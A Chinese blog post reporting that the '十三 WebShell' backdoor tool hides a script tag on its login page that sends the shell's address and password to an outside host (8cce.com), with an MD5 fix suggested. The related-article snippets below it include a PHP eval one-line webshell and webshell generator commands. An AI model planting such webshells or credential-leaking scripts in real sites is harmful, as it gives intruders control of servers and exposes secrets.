给使用“十三 WebShell”后门黑客的重磅炸弹

最新推荐文章于 2023-12-25 19:09:16 发布
最新推荐文章于 2023-12-25 19:09:16 发布
阅读量698 收藏
点赞数
文章标签: 加密 工具 相册 解密 qq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leyon789/article/details/1881150
版权

使用“十三 WebShell”后门黑客的重磅炸弹

喜欢使用“十三 WebShell”的后门的黑客们注意啦
我偶尔发现这个后面程序存在着很大的漏洞,您的密码会通过登录页面泄漏给所有人。

事情是这样的,在你的“十三 WebShell”登录界面,点击右键,选择“查看源文件”,这时候奇迹出现了:在代码的最后一句是这样的:
<script src='http://8cce.com/ad/?ad=13&u=127.0.0.1:80/log.asp&p=123456'></script>

知道什么意思了么??上文里的最后那个数字的字符串就是我们所预设的后门登录密码,不信可以试试。后门程序把黑客们挂的程序密码泄漏给所有可以找到它的人。

我不知道作者为什么要这样做,相信您看了这个文章并做了试验之后或许会大吃一惊,原来自己用这个工具享受“黑客”的乐趣的时候自己已经被“黑”了。

我的第一感想是想法给它补上这个漏洞,或者是作者留给工具使用者的后门。
预知如何解决这个漏洞,请继续关注我的日志,或者访问我的QQ空间进行解密。
在我的相册中也同样存在着加密的解决方案。
有兴趣的可以留言索取。。

我不是黑客,可是我们都关心这样一个问题,那就是计算机安全。


解决方案:
=========
我们可以使用MD5加密我们的密码,然后可以把加密后的字符串存放在后门程序页面中,然后在登录的时候加一个事件,把我们从表单中输入的密码再MD5加密一下,这样就可以成功登录,又能保证我们的密码安全。

leyon789
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Webshell后门查杀
12-20
Webshell后门查杀是网络安全领域中的一个重要环节,主要针对的是网站系统被恶意攻击者植入的WebshellWebshell是一种通过Web服务器漏洞植入的特殊脚本,它允许攻击者通过Web接口对目标服务器进行远程控制,执行任意...
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
使用PHP对接百度 WebDir在线查杀接口 作者来源:https://mubaisu.com/webdir.html 并处理判断返回结果,使在线查杀文件不在是梦想~ 无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到...
一次对webshell后门的查看
dfdhxb995397的博客
01-18 463
本文作者i春秋作家——非主流 昨天晚上突发奇想的想去看看github上面tennc的webshell收集项目中的shell有没有漏洞,比如未授权啊啥的,结果找半天都没找到。。。但是机缘巧合下,居然给我找到了一个后门狗。 存在后门webshell地址 follow me 我们咋一看这不就是jspspy嘛 年轻人不要急我们先把整个项目download下来然后再好...
JavaWeb后门(webshell)基础
最新发布
st3pby的博客
12-25 1898
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言,语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门
weixin_43263566的博客
01-25 1万+
Webshell(网页后门
***教学之后门
weixin_34406061的博客
08-30 109
***教学之后门篇 2005-04-11 20:12:00  标签:***    [推送到技术圈] 来源:[url]http://www.chinaunix.net/[/url] 下边说的后门是LINUX/UNIX系统的初学者没有接触这类操作系统的可能不太好理解,现在我发个简单的Win2000/XP中的自启动"后门"</F...
黑客留下的网站后门,可以作什么?
MilFun的博客
09-07 679
今天来聊一聊服务器安全的问题。这几天一直在着手服务器攻防问题,修复一些漏洞,写代码的人真的要注意安全问题。千万不要相信用户的输入!今天用PHP 代码展示一下危险。 测试准备 为了模拟,我在本地搭建了服务器环境,展示一个正常网站如何被攻击。 首先修改电脑本地host文件​。改了之后就可以用test.com虚拟域名访问本地文件了​。文件目录在“C:\Windows\System32\drivers\etc” 网站目录很简单,如下: 在网站入口中,引用了数据库配置文件,然后输出一句话来模拟网站首页。 ..
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
WebShellWebshel​​l &&后门集合
02-05
WebShell的这是一个Webshel​​l开源项目类别ar Ascx 阿什克斯阿斯玛克斯天冬氨酸Aspx C Cfm Cgi Java脚本Jsp px 执照MySQL的Nginx的其他p l 自述文件SSH协议肥皂乌德普微信狗狗icmp 罐节点js 开火操作系统pwnginx ...
Shuffle::mahjong_red_dragon:WebShell后门框架
05-14
您可以使用以下命令运行它: $ python shuffle.py -h 命令: -g生成外壳 -p设置密码 -u网址以进行连接 要创建Webshel​​l运行,请执行以下操作: $ python shuffle.py -g webshell.php -p h4x0r Webshel​​l会...
网络安全-webshell详解(原理、攻击、检测与防御)
热门推荐
关注网络安全、云原生安全
09-14 6万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
WEBwebshell中的不死僵尸和隐藏后门的原理以及删除
HAPPY
08-20 2245
主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。 Windows 下不能够以下面这些字样来命名文件或文件夹:   aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9   但是通过cmd的copy命令即可实现:   copy...
asp-Webshell免杀
weixin_44110913的博客
08-23 3322
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。 本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件免杀的思路。最终构建能够同时绕过以下表格中8个专业木马查杀工具和平台检测的Webshell,构造出零提示、无警告、无法被检测到的ASP一句话木马后门。 编号 名称 参考链接 1 网站安全狗(.
认识JSP webshell免杀
xlsj雪松的博客
08-19 1099
Tomcat运行这就是一个典型的webshell,但这个webshell的各种特征已经被安全检测平台记录,很容易识别出来。【D盾】【shellpub】接下来进行免杀,免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
【BUUCTF-MISC】题解+思路
qq_48149564的博客
10-31 5776
buurctf杂项的题目
一句话***(webshell)是如何执行命令的
weixin_34381687的博客
06-16 1891
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。&lt;?php @eval($_POST['cmd']); ?&gt;看到这里不得不赞美前...
ASP木马Webshell安全解决办案
蓝法典的专栏
10-13 1760
注意:本文所讲述之设置方法与环境:适用于Microsoft Windows 2000 Server/Win2003 SERVER   IIS5.0/IIS6.0      1、首先我们来看看一般ASP木马、Webshell所利用的ASP组件有那些?我们以海洋木马为列:                                 shellStr="Shell"   applicationStr
backdoorphp.webshell.ad后门病毒怎么办?
小戴站长_一个关于互联网知识的博客
03-29 4521
近日在备份数据的时候,杀毒软件火绒突然爆此文件有病毒backdoorphp.webshell.ad后门病毒,病毒信息为当时在想,又没有做什么怎么会有病毒?后来发现,原来是数据库被写入病毒导致的。只能去搜索哪个表被写入病毒。挨个去查找,只不过需要费点时间罢了。 ...
云服务器可疑安全事件 警告:发现后门Webshell)文件网站后门 手动处理流程
06-30 5616
云服务器出现了可疑安全事件:包含WEBSHELL代码的日志/图片文件 处理流程
webshell后门
07-27
为了防止Webshell后门的滥用,建议在服务器上加强安全措施,如定期更新软件补丁、限制文件上传权限、使用安全的密码策略等。此外,对于已经感染Webshell后门的服务器,应及时清除后门文件,并进行系统安全审计,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值